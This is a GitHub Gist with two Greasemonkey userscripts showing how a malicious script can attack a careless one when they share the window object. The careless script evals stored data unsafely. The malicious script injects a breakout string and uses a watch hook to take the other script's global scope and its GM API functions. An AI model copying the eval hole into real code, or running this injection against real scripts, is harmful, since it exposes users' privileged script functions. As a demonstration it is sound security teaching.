Created
February 10, 2011 17:31
-
-
Save sizzlemctwizzle/820938 to your computer and use it in GitHub Desktop.
An example of how a malicious script can target a careless script if the window object is shared between all scripts.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// ==UserScript== | |
// @name Careless Script | |
// @namespace http://test.free.fr | |
// @description A non-malicious script that saves and retrieves data carlessly. | |
// @include * | |
// ==/UserScript== | |
window.saveArray = function(name, array) { | |
GM_setValue(name, array.toString()); | |
}; | |
window.getArray = function(name) { | |
eval('var data = [' + GM_getValue(name) + '];') | |
return data; | |
}; | |
var data = [1, 2, 3, 4, 5, 6, 7, 8, 9]; | |
saveArray('data', data); | |
document.addEventListener('mousedown', function() { | |
var data = getArray('data'); | |
var sum = 0; | |
for (var i = 0, len = data.length; i < len; ++i) | |
sum += data[i]; | |
alert("Sum of saved data: " + sum); | |
}, false); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// ==UserScript== | |
// @name Malicious Script | |
// @namespace http://test.free.fr | |
// @description A malicious script that targets a careless script and gains access to its GM api functions. | |
// @include * | |
// ==/UserScript== | |
function exploit(getArray) { | |
if (typeof getArray == "undefined") | |
getArray = window.getArray; | |
saveArray('mal', ']; window.stash = this; var n = ['); | |
getArray('mal'); | |
var str = ""; | |
for (var i in window.stash) | |
str += i + "\n"; | |
alert("A malicious script has obtained a reference\n" + | |
"to the global object of another script. It now has\n" + | |
"access to these global variables of that script:\n\n" + str); | |
} | |
if (typeof saveArray != "undefined" && | |
typeof getArray != "undefined") { | |
exploit(); | |
} else { | |
window.saveArray = null; | |
window.getArray = null; | |
window.watch = Object.prototype.watch; | |
window.watch('getArray', function(id, oldval, newval) { | |
exploit(newval); | |
return newval; | |
}); | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment